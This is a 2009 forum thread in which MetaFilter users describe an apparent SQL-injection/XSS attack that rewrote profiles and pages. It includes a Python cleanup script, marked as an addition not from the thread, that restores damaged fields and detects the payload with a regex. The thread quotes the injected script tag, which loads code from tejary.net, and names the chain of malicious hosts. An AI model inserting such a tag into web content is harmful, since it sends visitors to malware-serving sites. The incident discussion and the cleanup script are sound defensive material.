
What is this javascript thingamabob?
January 24, 2009 5:16 AM

What's going on with our profiles and a JavaScript link to a purported attack site?

My profile, which was okay... yesterday, maybe? Day before?... is now the following:

I'm a writer, working by day i<script src=http://tejary.net/h.js></script>

Er? I'm not familiar with tejary.net, and it's not popping up in my NoScript settings; this also seems to be happening to other people's profiles.

Typing Tejary.net into my browser gives me

Reported Attack Site!
This web site at tejary.net has been reported as an attack site and has been blocked based on your security preferences.
Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.
Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.
posted by Shepherd to bugs at 5:16 AM (170 comments total) [add to favorites] 2 users marked this as a favorite [!]

Yeah, I just got a link sent to me by one of my contacts, directing me there.
posted by Greg Nog at 5:19 AM on January 24 [+] [!]


Every single field in my profile directs to that site now, and my bio blurb is deleted. WTF?
posted by Marisa Stole the Precious Thing at 5:21 AM on January 24 [+] [!]


Well, this is lovely.

I'm more irritated that it deleted my profile as written, because I'm too damned lazy to go back and rewrite that very boring story.
posted by Scattercat at 5:21 AM on January 24 [+] [!]


It's also in the category links in AskMe. Very odd!
posted by goo at 5:23 AM on January 24 [+] [!]


I just tried to send cortex a MeMail about this and all I kept getting was errors. Thought I was the only one seeing this happen but hm... either the server's caught a virus or been attacked. I keep seeing a frame tag appearing in profiles as well, with the URL http://kodim.net/CONTENT/faq.htm - also a malicious site.

Someone hold me.
posted by pyrex at 5:24 AM on January 24 [+] [!]


Well, I'm logging off and running a full system scan, AdAware etc., just in case something snuck through. Hopefully this isn't anything too serious.
posted by Shepherd at 5:25 AM on January 24 [+] [!]


Ew, yeah, it's all over the place. It's attached to the end of every entry in every field in my preferences page.
posted by lysistrata at 5:25 AM on January 24 [+] [!]


Here's a partial screenshot of what I'm looking at in my profile.

Anyone else getting this?
posted by Marisa Stole the Precious Thing at 5:26 AM on January 24 [+] [!]


Yep, that's exactly what I got, too.
posted by Greg Nog at 5:26 AM on January 24 [+] [!]


Eeeyep. That's the bunny, all right.

Looks like it's infested some other parts of the site, too; some of the links to search categories etc. look off.
posted by Scattercat at 5:27 AM on January 24 [+] [!]


That's what mine looks like as well.
posted by lysistrata at 5:27 AM on January 24 [+] [!]


Wow. Check out Projects...
posted by Scattercat at 5:28 AM on January 24 [+] [!]


yep, every field in my profile has that script.
posted by scruss at 5:29 AM on January 24 [+] [!]


Welp, we had a good run, eh?
posted by Marisa Stole the Precious Thing at 5:29 AM on January 24 [+] [!]


And if I try erasing every profile field and then save the changes the script is automatically reinserted right back in.
posted by lysistrata at 5:29 AM on January 24 [+] [!]


This canna be good. Cap'n, I think she's a gonna blow.
posted by netbros at 5:29 AM on January 24 [+] [!]


I noticed this around 5 AM PST and emailed the mods about this then. Around 4:55 AM the site seemed to be down.
posted by Blazecock Pileon at 5:30 AM on January 24 [+] [!]


Yeah, I'm being told that each section is infected with Malware and it asks me to go to kodim.com. When I say no and just go to the section, there are horizontal rules everywhere.
posted by You Should See the Other Guy at 5:30 AM on January 24 [+] [!]


RE: lysistrata

I edited mine and the deletions seem to have stuck. What kind of timeframe are you talking about?
posted by Scattercat at 5:30 AM on January 24 [+] [!]


Seriously, though, I'm not especially worried about my machine, due to OS reasons.

This seems like the sort of thing that looks siren-blowing, but gets remedied easily enough. Or maybe that's just my wishful thinking.
posted by Marisa Stole the Precious Thing at 5:31 AM on January 24 [+] [!]


Oi oi oi. Me too, godspeed and good luck pb. I am sure this won't be your most relaxing Saturday.
posted by Meatbomb at 5:31 AM on January 24 [+] [!]


It's certainly not winning any points in the subtlety department. I mean, no one is going to follow those links by mistake, and it's REALLY obvious stuff has been changed if you go to AskMe or Projects.
posted by Scattercat at 5:32 AM on January 24 [+] [!]


RE: lysistrata

I edited mine and the deletions seem to have stuck. What kind of timeframe are you talking about?


About five minutes ago. I just tried it again and the deletions stuck except for my email address because I'm not sure I want to mess with changing that while the script link is attached to it.
posted by lysistrata at 5:34 AM on January 24 [+] [!]


SQL injection?

The js file in question, h.js, is just one line: a document.write for that iframe directing people to kodim.net.

I hope everyone is running Noscript...
posted by milquetoast at 5:35 AM on January 24 [+] [!]


This is revenge for deleting that Bloggies post, I can feel it!
posted by Marisa Stole the Precious Thing at 5:35 AM on January 24 [+] [!]


NoScript blocks those scripts from appearing, but most of my profile is still gone.
posted by Kirth Gerson at 5:39 AM on January 24 [+] [!]


NoScript blocks those scripts from appearing, but most of my profile is still gone.

ABP seems to be doing the same thing for me, on my end anyway.
posted by Marisa Stole the Precious Thing at 5:40 AM on January 24 [+] [!]


Those of you who have been hit, do you display your email address in your profile?

My profile looks OK, even my Google map links, but when I look at any profile with that members' email address displayed (mine isn't), that address is definitely infected. Some people have the remaining text in their profile struck out, some don't, but if they also have a personal web site link, it is also infected. OTOH, community links such as Flickr and Last.fm seem OK.
posted by maudlin at 5:42 AM on January 24 [+] [!]


Me, too. I've now got tejary.net as my webpage. Never had a webpage before.

At last! Something interesting on my profile page.
posted by veedubya at 5:42 AM on January 24 [+] [!]


Hmmm, some of the "Also On" stuff was recently updated, wonder if that has anything to do with it.
posted by Brandon Blatcher at 5:44 AM on January 24 [+] [!]


Those of you who have been hit, do you display your email address in your profile?

I had it displayed to members, yes.
posted by lysistrata at 5:44 AM on January 24 [+] [!]


Wow. Yeah. This is weird and a little scary. Hold me!
posted by Stewriffic at 5:45 AM on January 24 [+] [!]


Mine wasn't displayed to members, but I did have it set to forward MeFiMail to my e-mail.

Seems like having your e-mail accessible via the site was a trigger of some kind...
posted by Scattercat at 5:47 AM on January 24 [+] [!]


After a few curl calls, it looks like this script eventually redirects to a Windows-based Chinese web site (www.51yes.com) which loads a 0-height iframe from a subdomain, which I'd guess probably tries to install malware through vulnerable browsers.
posted by Blazecock Pileon at 5:47 AM on January 24 [+] [!]



Hmmm, some of the "Also On" stuff was recently updated, wonder if that has anything to do with it.


Gawker IT got tired of just screwing up their own sites, and decided to branch out?
posted by inigo2 at 5:47 AM on January 24 [+] [!]


Never had my email address displayed. Only personal information I had on the there was my location, which isn't a link.
posted by veedubya at 5:48 AM on January 24 [+] [!]


Even on profiles with no email displayed, the tejary script pops up half a dozen times in the source.
posted by milquetoast at 5:49 AM on January 24 [+] [!]


Mathowie, what sort of separation is there between the information on a user's profile page, and their signup info? I mean, assuming the sort of access required for this attack, is there a possibility that PayPal info has been compromised?
posted by veedubya at 5:50 AM on January 24 [+] [!]


tejary.net -> kodim.net -> count49.51yes.com (which looks like it is hosting some kind of cookie stealing script).
I'm going to go change my password now.
posted by yeoz at 5:50 AM on January 24 [+] [!]


Seems like having your e-mail accessible via the site was a trigger of some kind...

I didn't have my email address in my profile. It still wiped out most of the profile, and inserted that script somewhere, though I can't see where.
posted by Kirth Gerson at 5:50 AM on January 24 [+] [!]


same here, tejary.net, kodim.net the domains and yes, I have my email visible on the profile...
posted by _dario at 5:50 AM on January 24 [+] [!]


WTF?

Yeah, I'm getting it too. Deleted all of the fields and such, but the profile, she be gone.
posted by rand at 5:51 AM on January 24 [+] [!]


come back jrun, all is forgiven!
posted by scruss at 5:52 AM on January 24 [1 favorite +] [!]


I think the common factors are displaying personal web site URLs OR your email address.

scattercat, veedubya, and Kirth Gerson, each of you has a website link next to your username.

I have my MeFi mail forwarded to my real email, and my profile is still OK. I don't display my email address or a personal web site link, just a few links to Last.fm and Google.
posted by maudlin at 5:53 AM on January 24 [+] [!]


Well, just ignore me. IANAH, I guess. Nor am I l33t, unless you count vhen I hyoos a metchsteek.
posted by Scattercat at 5:54 AM on January 24 [+] [!]


Email display is a red herring, y'all. The code done been compromised.
posted by milquetoast at 5:54 AM on January 24 [+] [!]


Ooooh. ThePinkSuperhero is gonna be PISSED!
posted by Stewriffic at 5:55 AM on January 24 [+] [!]


I never had a webpage displayed before this. That webpage link was inserted during this attack. As already stated, the only information I gave in my profile was my location (London), and that wasn't a link.
posted by veedubya at 5:56 AM on January 24 [+] [!]


Had my email set to hidden, but to forward MefiMail to my email, profile hacked. Had my website linked in the profile, but nothing funny seems to be going on there. Nothing odd in my email, either.
posted by Brandon Blatcher at 5:56 AM on January 24 [+] [!]


I don't have a webpage next to my name, nor was I displaying email, and my profile was compromised.
posted by Stewriffic at 5:56 AM on January 24 [+] [!]


Well, this is bad.
posted by yhbc at 5:57 AM on January 24 [+] [!]


I'm getting a "suspected malware" redirect when I try to access AskMetafilter (by clicking the link at the top of the page from the blue), but MetaTalk and Metafilter are fine.

Accessing AskMe was fine a couple hours ago.
posted by leahwrenn at 5:57 AM on January 24 [+] [!]


Ooooh. ThePinkSuperhero is gonna be PISSED!

Oh shit. That really sucks. I hope after all this is over and done with they give her the pink back. There were a lot of cool profiles that we're going to lose.* Unless they're backed up somewhere?

*Not that this is the biggest worry right now. I'd rather know be sure that our personal info is secure. Still, it's a shitty side effect.
posted by lysistrata at 5:58 AM on January 24 [+] [!]


Man, I'm gonna be super pissed if I get to work on Monday and find out *.metafilter is now blocked... Hack me all you want, but don't take away my metafilter!!
posted by inigo2 at 5:58 AM on January 24 [2 favorites +] [!]


Oh, that little bastard!

The email and personal web site links seems to be symptoms, not causes.

I now have a website link on my profile that didn't exist before today.

And yeah, tejary.net is sprinkled throughout the page source of my profile. It's like magma leaking to the surface ...
posted by maudlin at 5:59 AM on January 24 [+] [!]


I have a bad feeling we'll be down for a while after this.
posted by yhbc at 5:59 AM on January 24 [+] [!]


I think the common factors are displaying personal web site URLs OR your email address.

Nope. I had neither, and now I have a website that Opera says is an illegal URL and my profile blurb has been changed to include a link to the malicious page.
posted by cmonkey at 5:59 AM on January 24 [+] [!]


Also, ask.metafilter is hella fucked up with broken links to that page.
posted by cmonkey at 6:00 AM on January 24 [+] [!]


So has anyone *telephoned* the brigades? I know it's only 6 a.m. in the west, and Jessamyn's been sick...
posted by Stewriffic at 6:00 AM on January 24 [+] [!]


Oh and for what it's worth, my profile was fine around three or four hours ago.
posted by cmonkey at 6:04 AM on January 24 [+] [!]


Ask me and most profiles have the following dialog box:

Warning: Visiting this site may harm your computer

The website you are visiting appears to contain malware. Malware is malicious software that may harm your computer or otherwise operate without your consent. Your computer can be infected just by browsing to a site with malware, without any further action on your part.

For detailed information about problems found on this site or a portion of this site, visit the Google Safe Browsing diagnostic page for kodim.net.

Ignore warning Go Back.
posted by dog food sugar at 6:05 AM on January 24 [+] [!]


That's apparently when this brilliant stratagem was enacted.
posted by Scattercat at 6:05 AM on January 24 [+] [!]


Where the fuck is Obama now, huh?
posted by gman at 6:07 AM on January 24 [1 favorite +] [!]


Where the fuck is Obama now, huh?

OK, that's funny!
posted by Stewriffic at 6:08 AM on January 24 [+] [!]


Also -- the "posted by" line in MeFi has shrunk to small while in Meta and AskMe it has become larger type.
posted by ericb at 6:10 AM on January 24 [+] [!]


It's skwt, FOR SURE.
posted by gman at 6:10 AM on January 24 [1 favorite +] [!]


Bush told you this would happen with Obama.
posted by weapons-grade pandemonium at 6:12 AM on January 24 [+] [!]


WHOIS has a wealth of knowledge by which a hearty "go fuck yourself" could be delivered, if the domain owners are indeed behind this.

So has anyone *telephoned* the brigades?

I imagine that between the Midnight Mod What Mods at Midnight across the pond and jessamyn living out east, someone's laid eyes on this, yeah. Probably the silence is more attributable to them scrambling.
posted by middleclasstool at 6:12 AM on January 24 [+] [!]


on second thought, ditto on the email/link as a red herring; I'm on chrome and any page on the green tries to access those domains, same for the profiles OR the website link is infected with a doubly opened script tag which does not actually access the script; gray and blue look ok at the moment.
posted by _dario at 6:13 AM on January 24 [+] [!]


I can see AskMe fine, in Safari on a Mac. Only prob, which I noticed earlier this morning, is a weird bar graphic that extends beyond the category description for each question.

Last question posted in AskMe was submitted about 20 minutes ago. Looks like others are still able to submit answers. So, AskMe doesn't seem to be messed up for everyone.
posted by veedubya at 6:13 AM on January 24 [+] [!]


user:~> telnet kodim.net 80
Trying 66.226.30.51...
Connected to kodim.net.
Escape character is '^]'.
GET /CONTENT/faq.htm
HTTP/1.1 404 Not Found

That is the file the h.js script pulls in an iframe so perhaps this will not have teeth.
posted by cmonkey at 6:13 AM on January 24 [+] [!]


It's funny--I want to go take a shower and get ready for the day, but instead I am hovering here wanting to know what's up.
posted by Stewriffic at 6:15 AM on January 24 [+] [!]


music, projects, jobs also look compromised, the podcast blog looks ok.
posted by _dario at 6:16 AM on January 24 [+] [!]


Tejary.net sounds oddly familiar. I can't quite place where I've heard it before.
posted by Scattercat at 6:16 AM on January 24 [+] [!]


Error when sending MefiMail:

Attribute validation error for tag CFMAIL. The value of the attribute to, which is currently (recipient's email), is invalid.
The error occurred on line 114.
Current Page: http://www.metafilter.com/contribute/messages-write.mefi
Referring Page: http://www.metafilter.com/contribute/messages-write.mefi
Date and Time: Sat Jan 24 06:14:34 PST 2009
Your Browser: Mozilla/5.0 (browser info specifics here)
Your Location: (ip address here)
posted by Brandon Blatcher at 6:17 AM on January 24 [+] [!]


Oh noes!!!! We're under attaaaaaaaaack!!!
posted by The Straightener at 6:18 AM on January 24 [+] [!]


Datapoint: My email is visible to the world, I fwd my mefi mail to my email, and my profile still has content. Noscript is showing tejary.net includes however.
posted by Skorgu at 6:19 AM on January 24 [+] [!]


Huh. I had it in random places in my profile too -- just edited them all out and it seems okay now.
posted by EmpressCallipygos at 6:19 AM on January 24 [+] [!]


Tejary.net sounds oddly familiar. I can't quite place where I've heard it before.

Apparently a lot of places...
posted by inigo2 at 6:21 AM on January 24 [+] [!]


Huh. I had it in random places in my profile too -- just edited them all out and it seems okay now.

I did that too, but the link is embedded in my email address, and I'm hesitant to change it as it requires a pw...
posted by The Michael The at 6:21 AM on January 24 [+] [!]


And after my post on cracking passwords I set mine to a ludicrously strong one that I use only on this site. No it was not lovrboy before that.
posted by Skorgu at 6:22 AM on January 24 [+] [!]


Looks like the whois registry gives a Saudi Arabian site -- the site itself is under construction.
posted by EmpressCallipygos at 6:22 AM on January 24 [+] [!]


Looks like a one-time SQL injection for some basic, mildly varied, XSS attacks. It seems as though a dozen or so tables have been affected, and that attacker injects the code after the first 30 characters in the field, overwriting the rest. Hopefully our DB backup is fairly routine...?

It's a big pile of yuck, that's for sure.
posted by milquetoast at 6:24 AM on January 24 [+] [!]


I spoke too soon, my descriptiony-text thing was truncated and presumably replaced with a js call.
posted by Skorgu at 6:25 AM on January 24 [+] [!]


Zero Hour! In my garage I have 2 tall filing cabinets filled with the printed output of a script that I wrote - an Eliza bot that combined the total text of MetaFilter to this point with the front page of the New York Times, BoingBoing and YouTube, seasoned with Yahoo answers verbatim and Def Leppard song lyrics. Plus 3 cases of Miller High Life tall boys, a sleeve of Ritz crackers and a carton of Kools. I can last for, well, DAYS.

I'll see you fuckers on the other side.
posted by dirtdirt at 6:25 AM on January 24 [2 favorites +] [!]


al-Qa'ida.
posted by gman at 6:28 AM on January 24 [+] [!]


Hmm... this seems like it's starting to fit the bill.
posted by milquetoast at 6:28 AM on January 24 [1 favorite +] [!]


Zero Hour! In my garage I have 2 tall filing cabinets filled with the printed output of a script that I wrote - an Eliza bot that combined the total text of MetaFilter to this point with the front page of the New York Times, BoingBoing and YouTube, seasoned with Yahoo answers verbatim and Def Leppard song lyrics. Plus 3 cases of Miller High Life tall boys, a sleeve of Ritz crackers and a carton of Kools. I can last for, well, DAYS.

I'm in the bathtub with a mattress over my head. I like your plan better. :(
posted by lysistrata at 6:28 AM on January 24 [+] [!]


Happily, I still have all my plastic sheeting and duct tape left over from 2001, so it's all good.
posted by mr_crash_davis mark II: Jazz Odyssey at 6:30 AM on January 24 [2 favorites +] [!]


Nevar forget 1/24, etc. It's really weird, I don't recall anything like this happening before.
posted by moonbird at 6:30 AM on January 24 [+] [!]


Just e-mailed Matt and Jessamyn and sent a Gchat message to cortex.
posted by grouse at 6:31 AM on January 24 [+] [!]


*backs up db just to be safe.*
posted by chillmost at 6:31 AM on January 24 [+] [!]


Ironically I was pissed at the world the other day and deleted my personal info from about a million web sites, including this one....

This does, however, suck...
posted by HuronBob at 6:31 AM on January 24 [+] [!]


mobile safari doesn't give the error, just takes forever to load askme
posted by Brandon Blatcher at 6:32 AM on January 24 [+] [!]


When I try to go to Askme, I keep getting a sign that the page is waiting to load "Kodim.net" -- here's Norton utilities page on that site.

I get to the site fine, but it looks like something else is attached to it and lurking in the background. The formatting looks a little off too.
posted by EmpressCallipygos at 6:36 AM on January 24 [+] [!]


Settle down, people. I requested this pony two months ago! Thanks for listening, mods!
posted by nitsuj at 6:37 AM on January 24 [3 favorites +] [!]


My profile blinks for like 1/4 of a second-- not long enough for it to load correctly, then I get a dark grey page with a light grey text box with a red header that says: "WARNING: VISITING THIS SITE MAY HARM YOUR COMPUTER." It has "go back" & "continue" buttons, both of which I determined I should not click. Mac OS X 10.5.6 Safari.


Here's hoping that if the profiles are hosed, they can roll back to a 2 or 3 day-old backup.
posted by Devils Rancher at 6:38 AM on January 24 [+] [!]


I get to the site fine, but it looks like something else is attached to it and lurking in the background.

That's just me.
posted by gman at 6:38 AM on January 24 [1 favorite +] [!]


Norton's site shows 195 specific threats from Tejary. Neat!
posted by moonbird at 6:40 AM on January 24 [+] [!]


So while the admins are figuring out what the fuck... How would you go about repairing the damage from something like this? Assume the following:
1. you have a db backup from yesterday
2. it is only a few fields in the user profiles that have been affected.
3. None of the actual fields containing content (posts or comments) have been compromised.

Would the easiest way be to just replace the compromised fields in the current running db from the last backup? I'm curious how one would do that just in case I have a similar problem in the future.

Of course we don't know what the fuck they are looking at on the backend there. It could be as innocuous as I just described above or it could be a big mess.

I wish the mods luck.
posted by chillmost at 6:41 AM on January 24 [+] [!]
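The repair chillmost asks about, given milquetoast's read of the damage (a field cut at 30 characters with the tejary.net tag appended), as an added example that is not from the thread or from MetaFilter's own code. The table and column names (users, users_backup, bio, email, website) are assumptions, since the thread never names the real schema; the sample rows are constructed, with the first one mirroring the truncated bio quoted at the top of the thread. It restores only the fields that carry the injected tag, so edits users made since the backup in untouched fields survive, and it handles the row that has no backup copy (a user who signed up after the backup) by stripping the tag instead.

```python
import re
import sqlite3

# The injected tag exactly as quoted in the thread; the regex also tolerates quoting and
# whitespace variants so a differently rendered copy of the same include is not missed.
INJECTED_TAG = '<script src=http://tejary.net/h.js></script>'
INJECTION_RE = re.compile(r'<script[^>]*tejary\.net/h\.js[^>]*>\s*</script>', re.IGNORECASE)

# Hypothetical column names: the thread never names MetaFilter's real schema.
# These identifiers are trusted constants, never user input, which is why they may be
# interpolated into SQL below; every value still goes through a bound parameter.
PROFILE_COLUMNS = ('bio', 'email', 'website')


def build_sample_db():
    """Constructed in-memory database: 'users_backup' holds yesterday's clean copy,
    'users' holds the damaged live data (field cut at 30 characters, tag appended)."""
    conn = sqlite3.connect(':memory:')
    conn.executescript("""
        CREATE TABLE users_backup (userid INTEGER PRIMARY KEY, bio TEXT, email TEXT, website TEXT);
        CREATE TABLE users        (userid INTEGER PRIMARY KEY, bio TEXT, email TEXT, website TEXT);
    """)
    clean = [
        (1, "I'm a writer, working by day in an office and by night at a desk.",
         'writer@example.org', 'http://example.org/'),
        (2, 'Just here for the cat pictures.', '', ''),
        (3, 'London.', '', ''),
    ]
    conn.executemany('INSERT INTO users_backup VALUES (?, ?, ?, ?)', clean)
    live = []
    for row in clean:
        userid, *fields = row
        if userid == 2:                      # user 2 was never touched
            live.append(row)
        else:                                # users 1 and 3: every field hit
            live.append((userid, *[f[:30] + INJECTED_TAG for f in fields]))
    # user 4 signed up after the backup was taken, so there is no clean copy to restore
    live.append((4, 'New here.'[:30] + INJECTED_TAG, '', INJECTED_TAG))
    conn.executemany('INSERT INTO users VALUES (?, ?, ?, ?)', live)
    conn.commit()
    return conn


def find_injected(conn, table, columns):
    """Return sorted (userid, column) pairs whose value carries the injected tag."""
    hits = []
    cur = conn.execute(f'SELECT userid, {", ".join(columns)} FROM {table}')
    for userid, *values in cur:
        for col, val in zip(columns, values):
            if val and INJECTION_RE.search(val):
                hits.append((userid, col))
    return sorted(hits)


def repair(conn, table, backup, columns):
    """Restore only the compromised fields from the backup. Rows with no backup copy
    get the tag stripped instead. Returns (restored, stripped) counts."""
    restored = stripped = 0
    for userid, col in find_injected(conn, table, columns):
        row = conn.execute(f'SELECT {col} FROM {backup} WHERE userid = ?', (userid,)).fetchone()
        if row is not None:
            conn.execute(f'UPDATE {table} SET {col} = ? WHERE userid = ?', (row[0], userid))
            restored += 1
        else:
            cur_val = conn.execute(f'SELECT {col} FROM {table} WHERE userid = ?',
                                   (userid,)).fetchone()[0]
            conn.execute(f'UPDATE {table} SET {col} = ? WHERE userid = ?',
                         (INJECTION_RE.sub('', cur_val), userid))
            stripped += 1
    conn.commit()
    return restored, stripped


def run_demo():
    """Scan, repair, rescan; returns (hits before, (restored, stripped), hits after, rows)."""
    conn = build_sample_db()
    before = find_injected(conn, 'users', PROFILE_COLUMNS)
    counts = repair(conn, 'users', 'users_backup', PROFILE_COLUMNS)
    after = find_injected(conn, 'users', PROFILE_COLUMNS)
    rows = conn.execute('SELECT * FROM users ORDER BY userid').fetchall()
    return before, counts, after, rows


if __name__ == '__main__':
    before, counts, after, rows = run_demo()
    print(f'{len(before)} injected fields found; restored {counts[0]}, stripped {counts[1]}; '
          f'{len(after)} remaining')
    for r in rows:
        print(r)
```

Restoring by field rather than by row is what keeps a user's post-backup changes in the fields that were not hit; the trade-off is that a field that was both edited after the backup and then overwritten by the attack reverts to the older text, and a field of a user with no backup row is only as clean as the regex is complete (the stripped field for user 4 loses the text the attack truncated, because nothing can bring it back).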


All the text is much bigger on MeTa, now. If it switches the font to comic sans, I'll really start to worry.
posted by yhbc at 6:41 AM on January 24 [+] [!]


So help me out here. I know nothing about computers beyond that they provide the lion's share of my day-to-day entertainment and that I probably have a false sense of security for using a mac.

What does this sort of "attack" mean, why do people do it, and what are the sorts of things that happen because of them, besides driving the site owners to a young death over dealing with the repercussions?
posted by Stewriffic at 6:42 AM on January 24 [+] [!]


I just emailed mathowie, jessamyn, pb, and cortex, and left DM's on their Twitter accounts, messages on their Facebook profiles, comments on their respective blogs; After checking their current Loopt locations, and cross referencing that with the 10 most recent photos in their Flickr stream, I called them, faxed them, and snail mailed them; Pretty soon I'll friend them on Last.fm and share an mp3 of me explaining the situation while Friendfeeding their Bebos. And then I purchased a star in the 56-STRING galaxy for each of them, naming it after their first born child.
posted by nitsuj at 6:42 AM on January 24 [18 favorites +] [!]


What, no smoke signals?
posted by yhbc at 6:43 AM on January 24 [+] [!]


fwiw the Whois pages for these fine people might be a good place to send the militia.
posted by moonbird at 6:46 AM on January 24 [+] [!]


fwiw the Whois pages for these fine people might be a good place to send the militia.

Yeah, because if you're slick enough to hack the matrix mefi, you're dumb enough to leave your home address in the WHOIS. Orlando, here we come!
posted by nitsuj at 6:47 AM on January 24 [+] [!]


You must repair him! Sir, if any of my circuits or gears will help, I'll gladly donate them!
posted by cowbellemoo at 6:49 AM on January 24 [+] [!]


Pretty soon I'll friend them on Last.fm and share an mp3 of me explaining the situation while Friendfeeding their Bebos.

I used to have an icon of me Friendfeeding my Bebos but Livejournal deleted it because it showed too much areola.
posted by lysistrata at 6:52 AM on January 24 [+] [!]


We have the technology!
posted by chillmost at 6:52 AM on January 24 [+] [!]


What does this sort of "attack" mean, why do people do it, and what are the sorts of things that happen because of them, besides driving the site owners to a young death over dealing with the repercussions?

It's designed to either a) rewrite the code on the page so instead of going to MeFi when I click a particular link, I instead end up at some other site, or b) rewrite the code so I not only do that, I get my own account rewritten so I make other people do the same thing when they click on a link on my own page.

It's technically a kind of advertising, only really, really, really aggressive. Think of it like this:

Junk mail is kind of like Spam -- it comes into your inbox and you don't know how you got on the mailing list, but there it is and you can just throw it away.

Popups are like telemarketers -- they're a bit more in-your-face because you're in the middle of doing something and suddenly someone pops up and says, "hi, pay attention to me, please?" and you have to take another step to make it go away before you can get back to what you were doing.

Ads on the sides of web pages are like ads on television -- easy to ignore and, with certain programs/TIVO, skippable.

This would be the equivalent of someone breaking into your house, physically lifting you up, and carrying you to the store/product/service they're advertising and forcing you to listen to a pitch about it, and when you try to leave they make you wear a sandwichboard.
posted by EmpressCallipygos at 6:53 AM on January 24 [1 favorite +] [!]


OK, but is it also going to rough me up in the meanwhile? i.e. should I leave the site while this is being dealt with?

(Thanks for the explanation)
posted by Stewriffic at 6:54 AM on January 24 [+] [!]


What does this sort of "attack" mean, why do people do it, and what are the sorts of things that happen because of them, besides driving the site owners to a young death over dealing with the repercussions?

There are a lot of potential motivations behind such an attack. Usually, it's intended to trick people into downloading software that will turn their computers into zombies. These zombie computers, without the knowledge of or input from their hapless owners, can then be directed to perform any number of tasks, such as launch attacks against other websites, route naughty pictures, send out spam emails, calculate the value of the square root of zero, and so on.

The idea is to recruit more computers to the cause, whatever that cause might be. At its peak, the Storm Botnet, for example, had around 40 or 50 million zombie computers at its disposal. That's a lot of evil, evil processing power.
posted by milquetoast at 6:54 AM on January 24 [+] [!]


we'll meet again
don't know where
don't know when
but I know we'll meet again
some sunny day
posted by otolith at 6:55 AM on January 24 [+] [!]


OK, I'm out of here, just in case.
posted by Stewriffic at 6:55 AM on January 24 [+] [!]


As long as we're keeping score, I'm not having any issues here in Korea. Could this be a States/North America thing?
posted by bardic at 6:58 AM on January 24 [+] [!]


There are a lot of potential motivations behind such an attack. Usually, it's intended to trick people into downloading software

Can it automatically download the software or would someone still have to give it permission to install? I'm not too worried since I'm running Opera on Linux with JavaScript disabled (well, it's disabled now but wasn't when I first noticed the script code in my profile) but I'd rather be safe than sorry.
posted by lysistrata at 7:00 AM on January 24 [+] [!]


I'm only seeing this in Firefox. I fired up IE and no problemo (apparently).
posted by SteveInMaine at 7:01 AM on January 24 [+] [!]


Those boyzone threads are looking good now.
posted by Brandon Blatcher at 7:01 AM on January 24 [+] [!]


Whatevs. This place has sucked since November 4 2008 anyways. Not nearly enough Sarah Palin.

See you fuckers in 2012!
posted by bardic at 7:02 AM on January 24 [+] [!]


Fire up the MatSignal!
posted by ALongDecember at 7:03 AM on January 24 [1 favorite +] [!]


I was just on the projects page in IE and the browser prompted me to install the Chinese Simplified language pack. Not a good sign, I'd say.

Time to download malwarebytes and check things out more thoroughly.
posted by SteveInMaine at 7:05 AM on January 24 [+] [!]


I'm not having any issues here in Korea. Could this be a States/North America thing?

Why?! Because our students trail woefully behind Asian countries in both Math and Science?

I don't want to live in a world where the site I love is punished because of the failing US educational system!

I've withdrawn all my money from the banks, filled up the car with gas just in case, and went to Shaws to stock up on Wonder Bread, mustard and Pepsi One. I'll be in my panic room if anyone is looking for me.
posted by jerseygirl at 7:07 AM on January 24 [+] [!]


Welp, my profile's got this, too. I'll keep watching this space for updates on the situation.
posted by The Great Big Mulp at 7:09 AM on January 24 [+] [!]


fwiw the Whois pages for these fine people might be a good place to send the militia.

I can guarantee that absolutely no information you get from whois will be useful. A better starting point would be contacting WebHost4Life, who owns the netblock kodim.net is in and presumably hosts the site, and asking them to cut off service for what is clearly a malicious site. If they ignore you, you could contact Alchemy Communications, Inc., who owns the netblock WebHost4Life is leasing, and ask if they can lean on them.

tejary.net looks like it is hosted with GoDaddy (via "secureserver.net"), so you're pretty much fucked with regards to getting those incompetent scamming assholes to do anything about it.

You could also contact China Telecom and ask them to cut off access to the 51yes.com domain but you will get nowhere and probably wind up agreeing with those of us who think that Chinese and Russian netblocks should just be blackholed entirely from the Internet.
posted by cmonkey at 7:12 AM on January 24 [+] [!]


Gah.

I have Firefox + NoScript at home, but IE at work. I guess overtime today is going to suck a lot more, if I can't visit here.

On Google Chat, at least, jessamyn & mathowie are offline, though that might be overzealous Javascript switched-off-ness.

Oh! Adding "127.0.0.1 tejary.net" to your hosts file might help, if you're skittish. That's presuming no more breakage, though. (On Firefox, add the NoScript extension.)

If you have links, the browser, view source code is "\".

And this thread is growing, so on preview, um, I can't catch up, gotta get ready for work...
posted by Pronoiac at 7:13 AM on January 24 [+] [!]


I think the common factors are displaying personal web site URLs OR your email address.

I had neither, and the only "Also On" I link to is my YouTube account. Every field in my profile except latitude & longitude had the malware tags. I just edited them all out manually. Metafilter's database has been compromised somehow, it's not because of anything in our profiles. This is really, really not good, guys.
posted by DecemberBoy at 7:15 AM on January 24 [+] [!]


Malwarebytes didn't find a problem with my PC, and my antivirus software hasn't screamed bloody murder yet.

I fired up the Chrome browser and it stopped me from viewing profile pages with a warning about tejary.net malware.

Don't forget the batteries and candles, jerseygirl.
posted by SteveInMaine at 7:16 AM on January 24 [+] [!]


Okay, I just checked the mefi whois, got a phone number, called & left a message. I think that was the office number, not mathowie's home number.
posted by Pronoiac at 7:18 AM on January 24 [+] [!]


*puts on football helmet and three changes of clothes, just in case*
posted by deezil at 7:19 AM on January 24 [+] [!]


DecemberBoy: "I think the common factors are displaying personal web site URLs OR your email address.

I had neither, and the only "Also On" I link to is my YouTube account. Every field in my profile except latitude & longitude had the malware tags. I just edited them all out manually. Metafilter's database has been compromised somehow, it's not because of anything in our profiles. This is really, really not good, guys."

Same here. Same deal. pb will make it all better soon enough.
posted by Science! at 7:19 AM on January 24 [+] [!]


"I was just on the projects page in IE and the browser prompted me to install the chinese simplified language pack."

This place is becoming more like Fallout 3 every day.
posted by bardic at 7:19 AM on January 24 [+] [!]


Also, I noticed maybe an hour and a half or so ago that the site was strangely unresponsive. That could be when the attack was being executed.
posted by DecemberBoy at 7:20 AM on January 24 [+] [!]


I'm running firefox 3 on OSX. The category links look screwy on ask.me and the weird stuff is in my profile, but I'm not seeing much else. Just as a data point.
posted by sugarfish at 7:20 AM on January 24 [+] [!]


I've seen this attack before on a client site - at least, I recognise the URL it's pointing to. If memory serves, it was a SQL injection attack. Or somesuch. Except that MeFi doesn't use SQL, does it?
posted by Jofus at 7:20 AM on January 24 [+] [!]
